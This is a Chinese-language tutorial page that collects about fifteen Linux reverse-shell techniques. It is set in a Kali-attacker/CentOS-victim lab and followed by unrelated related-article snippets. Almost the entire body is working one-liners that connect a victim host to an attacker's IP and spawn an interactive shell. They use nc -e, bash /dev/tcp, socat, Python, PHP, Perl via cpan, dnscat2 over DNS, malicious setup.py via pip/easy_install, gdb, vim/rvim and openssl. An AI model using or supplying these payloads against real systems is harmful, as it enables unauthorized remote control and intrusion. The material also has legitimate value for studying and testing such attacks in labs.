Linux多姿势反弹shell

news/2024/9/28 13:15:06 标签: linux, shell, bash, 安全, socket

前言

以下反弹shell的各种方法是小R收集到的,部分没有复现成功的方法没有放上来,待复现成功后会慢慢把文章完善,如有错误请帮忙指出。

演示环境:
攻击机:kali
受害机:CentOS7


1.Nc -e反弹

攻击端:

nc -lvp 23333

受害端:

nc -e /bin/bash 192.168.154.129 23333

在这里插入图片描述
在这里插入图片描述

2.Bash -i反弹

攻击端:

nc -lvp 23333

受害端:

bash -i >/dev/tcp/192.168.154.129/23333 0>&1 2>&1

bash重定向到攻击机23333端口0和2表示标准输出和错误输出都重定向到攻击端。)
在这里插入图片描述
在这里插入图片描述

3.Telnet反弹(需安装telnet服务)

攻击端:

nc -lvp 23333

受害端:

telnet 192.168.154.129 23333 | /bin/bash | telnet 192.168.154.129
23334

在这里插入图片描述

第一个监听窗口执行命令:
在这里插入图片描述
第二个监听窗口回显:
在这里插入图片描述

4.Whois反弹

攻击端:

nc -lvp 23333

受害端:

whois -h 192.168.85.141 -p 23333 ‘whoami’

获得回显:
在这里插入图片描述

5.socat反弹

攻击端:

nc -lvp 23333

受害端:

socat exec:’bash -li’,pty,stderr,setsid,sigint,sane
tcp:192.168.154.129:23333

在这里插入图片描述
在这里插入图片描述

6.Python反弹

攻击端:

nc -lvp 23333

受害端:

Python -c “import
os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘192.168.154.129’,23333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’-i’]);”

在这里插入图片描述
在这里插入图片描述

7.Php -r反弹

攻击端:

nc -lvp 23333

受害端:

php -r ‘$sock=fsockopen(“127.0.0.1”,23333);system("/bin/bash -i <&3 >&3 2>&3");’

(要先确认system函数在ini中是否被禁用)
在这里插入图片描述
在这里插入图片描述

8.Dnscat反弹

(基于DNS协议的通信工具,一般的通信工具基于TCP等的传输方式非常容易被防火墙拦截,但是dnscat2基于的DNS查询与响应报文一般不会被拦截,进而可以完成信息传输。)
DnsCat服务器的安装:

#git clone https://github.com/iagox86/dnscat2.git
#cd dnscat2
#cd server
#sudo gem install bundler
#bundle install
#sudo ruby./dnscat2.rb

在这里插入图片描述

客户端:

git clone https://github.com/iagox86/dnscat2 
cd dnscat2/client/ 
Make
./dnscat --dns server=192.168.2.101,port=53 --secret=706f8a6c1950ea305a82c9d6d873b958

会话建立:
在这里插入图片描述
列出所有通道

windows

在这里插入图片描述
进入客户端1通道

window -i 1

在这里插入图片描述
建立反弹shell

shell

在这里插入图片描述
退出当前通道,进入shell

suspend //表示退出当前通道
Windows
window -i 2//进入shell通道后,可按ctrl+z退出当前shell

在这里插入图片描述

9.Cpan反弹

CPAN是一支Perl程序的名字,其作用是让使用者容易从CPAN下载、安装、更新及管理其他在CPAN上的Perl程式。

攻击机监听:nc -lvp RPORT
受害机:

cpan
! use Socket; my $i="[攻击机IP]"; my $p=[攻击机端口]; socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S"); open(STDOUT,">&S"); open(STDERR,">&S"); exec("/bin/sh -i");};

在这里插入图片描述
在这里插入图片描述

10.easy_install反弹

easy_install是由PEAK(Python Enterprise Application Kit)开发的setuptools包里带的一个命令,所以使用easy_install实际上是在调用setuptools来完成安装模块的工作。

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345

受害机:
export 的意思是定义全局变量。

export RHOST=192.168.85.141 export RPORT=12345 TF=$(mktemp -d) echo
‘import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")’ >
$TF/setup.py easy_install $TF

获得响应:
在这里插入图片描述

11.Gdb反弹

UNIX及UNIX-like下的调试工具。

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345

受害机:

export RHOST=192.168.85.141 export RPORT=12345 gdb -nx -ex ‘python
import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")’ -ex
quit

在这里插入图片描述

获得响应:
在这里插入图片描述

11.Ksh反弹

ksh 命令调用 Korn shell,这个 shell 是一个交互式的命令解释器和命令编程语言。这个 shell 可交互式的从终端键盘或从一个文件中执行命令。

攻击机:

nc -l -p 12345

受害机:

export RHOST=192.168.85.141
export RPORT=12345
ksh -c ‘ksh -i >/dev/tcp/$RHOST/$RPORT 2>&1 0>&1’
在这里插入图片描述

获得响应:
在这里插入图片描述

12.openssl 反弹

OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上。

攻击机:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days
365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -port 12345

在这里插入图片描述
在这里插入图片描述

受害机:

RHOST=192.168.85.141 RPORT=12345 mkfifo /tmp/s; /bin/sh -i < /tmp/s
2>&1 | openssl s_client -quiet -connect $RHOST:$RPORT > /tmp/s; rm /tmp/s

在这里插入图片描述

获得响应:
在这里插入图片描述

13.Pip反弹

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.

受害机:

export RHOST=192.168.85.141 export RPORT=12345 TF=$(mktemp -d) echo
‘import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")’ >
$TF/setup.py pip install $TF
在这里插入图片描述

获得响应:
在这里插入图片描述

14.Rvim反弹

相当于vim
此方法需要python3环境

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345

受害机:

export RHOST=192.168.85.141 export RPORT=12345 rvim -c ‘:py import
vim,sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")
vim.command(":q!")’

在这里插入图片描述

获得响应:
在这里插入图片描述

15.Vim反弹

vim需要python3环境

攻击机:

socat file:`tty`,raw,echo=0 tcp-listen:12345
在这里插入图片描述

受害机:

export RHOST=192.168.85.141 export RPORT=12345 vim -c ‘:py import
vim,sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")
vim.command(":q!")’
在这里插入图片描述

获得响应:
在这里插入图片描述


http://www.niftyadmin.cn/n/1440304.html

相关文章

束手无策 MSN、QQ盗号容易追讨难(转)

每天到单位就挂上MSN或QQ(均为在线聊天工具)&#xff0c;已成为许多人上班第一件事。但最近有不少读者向本报反映&#xff0c;MSN密码被人恶意盗取&#xff0c;自己费尽周折方才取回。记者调查发现&#xff0c;网络黑客软件能轻易下载&#xff0c;MSN和QQ公司对此类盗号行为基本…

面试不过的原因?不仅适用数据分析师!

数据分析师面试&#xff0c;一般会遇到三类面试官&#xff1a; 1. 数据部门同事 2. 业务部门同事 3. HR同事 这三位面试官中&#xff0c;不同公司可能会安排部门负责人面试。 接下来的场景在面试的时候&#xff0c;可能都会遇到&#xff08;以下都是案例&#xff0c;如有雷同&a…

何把自己主页让别人放到收藏夹里跟着一个图标(转)

问&#xff1a; 如何把自己主页让别人放到收藏夹里跟着一个图标&#xff1f; 答: icon.ico是一个图标文件&#xff0c;你可以使用一些工具编辑 比如vc有编辑ico文件的功能。 来自 “ ITPUB博客 ” &#xff0c;链接&#xff1a;http://blog.itpub.net/10294527/viewspace-12463…

5天noip训练心得

day1 100950195 T1 二分答案&#xff0c;并查集&#xff0c;很像noip2017 day2 T1 T2 缩环&#xff0c;然后数据结构维护求答案&#xff0c;貌似也是原题 T3 树形dp&#xff0c;比赛上没有做出来&#xff0c; day2 907060220 T1 dp随便维护一下&#xff0c;比赛上没看清题意&am…

动态网站设计十八般武艺——ASP篇(八)(转)

在上一篇中作者给大家详细介绍了ASP内建对象Response的使用方法&#xff0c;在这一篇中作者将继续给大家介绍另两个非常实用且重要的ASP的内建对象Application和Session。 在ASP的内建对象中除了用于发送、接收和处理数据的对象外&#xff0c;还有一些非常实用的代表Active Ser…

变量、函数和程序控制

一、复合语句和顺序结构 1、c语言的基本单位是&#xff1a;语句&#xff1b; 2、如何使多个语句顺序执行&#xff08;复合语句&#xff09;&#xff1a; 由多个语句组成&#xff0c;用大括号包起来的语句 二、变量的概念及使用 1、变量定义&#xff1a; 变量是表示数据的存储 2…

python写一个incaseformat检测工具

一、incaseformat 1.13日爆发的incaseformat病毒会在对应的系统时间触发攻击行为&#xff0c;能在短时间内删除除了系统盘之外的所有文件。据研究人员称该病毒会在1.23再次爆发&#xff0c;小R根据该病毒生成特点制作了一个简单的检测工具。 编程环境&#xff1a;python3.7 二…

[图文]C++ SDK+Symbian开发入门之应用程序(转)

由于Series 60应用程序可以从命令提示符或IDE中建立&#xff0c;因此我们同时详细介绍了这两种方法。我们先从使用IDE提供的C编译器建立运行在PC上的模拟器&#xff08;也就是x86指令集&#xff09;的项目开始。我们同时使用了调试建立&#xff0c;因此可以使用符号调试信息和内…